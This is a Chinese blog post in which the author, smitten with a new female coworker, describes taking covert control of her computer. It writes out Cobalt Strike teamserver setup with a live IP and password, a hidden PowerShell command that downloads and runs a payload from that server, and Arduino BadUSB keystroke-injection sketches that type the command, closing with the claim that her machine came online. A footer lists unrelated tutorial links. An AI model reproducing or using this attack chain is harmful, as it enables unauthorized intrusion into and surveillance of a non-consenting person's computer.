渗透小姐姐的心系列-控制小姐姐电脑(1)

简介: 渗透小姐姐的心系列-控制小姐姐电脑(1)

背景

 

公司前几天刚入职了一个小姐姐,看到她的第一眼,我发现我恋爱了。

所以我一定要拿到她的电脑权限!!!!



 

Badusb:伪造计算机交互设备

 

 

1.部署cs

服务器:

通过screen启动cs服务端

screnn -dmS xiaojiejie
screnn -r xiaojiejie
./teamserver 111.229.77.212 520520

 

 


 

客户端启动

 


java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

 

客户端连接

 

c9ce9e9d76cf77b1f73304003d62f2e2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


配置监听器:

 


 

生成后门下载链接

 


 

 

 

复制出


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))"

 

安装Arduino IDE(回复公众号(渗透小姐姐的心)查看下载链接。)

 


设置开发版和编程器

 

 

编写代码

#include<Keyboard.h>
void setup(){
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))"");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.end();
}
void loop()
{
}

 


指令过长

重新生成payload

 


保存到桌面

上传到服务器

使用python实现下载服务


python -m SimpleHTTPServer 8080

 


 

写入代码

#include<Keyboard.h>
void setup(){
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd.exe /c powershell.exe IEX(New-ObjectNet.WebClient).DownloadString('http://111.229.77.212:8080/xiaojiejie.ps1')");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.end();
}
void loop()
{
}

验证

 


 

取得开发版信息

 

硬件插入电脑

打开Arduino IDE

工具->->选择Arduino Leonardo

工具->Port->选择COM* (Arduino Leonardo)

现在可以看到IDE右下角出现Arduino Leonardo on COM*

 

4924f4c4f3be54ba30d6ab5365a73f3c_640_wx_fmt=gif&wxfrom=5&wx_lazy=1.gif

上传



 

插上小姐姐的电脑,成功上线!

 

 


相关文章
|
7天前
|
人工智能 安全 Linux
【OpenClaw保姆级图文教程】阿里云/本地部署集成模型Ollama/Qwen3.5/百炼 API 步骤流程及避坑指南
2026年,AI代理工具的部署逻辑已从“单一云端依赖”转向“云端+本地双轨模式”。OpenClaw(曾用名Clawdbot)作为开源AI代理框架,既支持对接阿里云百炼等云端免费API,也能通过Ollama部署本地大模型,完美解决两类核心需求:一是担心云端API泄露核心数据的隐私安全诉求;二是频繁调用导致token消耗过高的成本控制需求。
5024 8
|
15天前
|
人工智能 JavaScript Ubuntu
5分钟上手龙虾AI!OpenClaw部署(阿里云+本地)+ 免费多模型配置保姆级教程(MiniMax、Claude、阿里云百炼)
OpenClaw(昵称“龙虾AI”)作为2026年热门的开源个人AI助手,由PSPDFKit创始人Peter Steinberger开发,核心优势在于“真正执行任务”——不仅能聊天互动,还能自动处理邮件、管理日程、订机票、写代码等,且所有数据本地处理,隐私完全可控。它支持接入MiniMax、Claude、GPT等多类大模型,兼容微信、Telegram、飞书等主流聊天工具,搭配100+可扩展技能,成为兼顾实用性与隐私性的AI工具首选。
20830 114
|
6天前
|
JavaScript Linux API
保姆级教程,通过GACCode在国内使用Claudecode、Codex!
保姆级教程,通过GACCode在国内使用Claudecode、Codex!
4049 1
保姆级教程,通过GACCode在国内使用Claudecode、Codex!
|
11天前
|
人工智能 安全 前端开发
Team 版 OpenClaw:HiClaw 开源,5 分钟完成本地安装
HiClaw 基于 OpenClaw、Higress AI Gateway、Element IM 客户端+Tuwunel IM 服务器(均基于 Matrix 实时通信协议)、MinIO 共享文件系统打造。
8003 11
|
13天前
|
人工智能 JavaScript API
保姆级教程:OpenClaw阿里云/本地部署配置Tavily Search skill 实时联网,让OpenClaw“睁眼看世界”
默认状态下的OpenClaw如同“闭门造车”的隐士,仅能依赖模型训练数据回答问题,无法获取实时新闻、最新数据或训练截止日期后的新信息。2026年,激活其联网能力的最优方案是配置Tavily Search技能——无需科学上网、无需信用卡验证,每月1000次免费搜索额度完全满足个人需求,搭配ClawHub技能市场,还能一键拓展天气查询、邮件管理等实用功能。
7839 5

热门文章

最新文章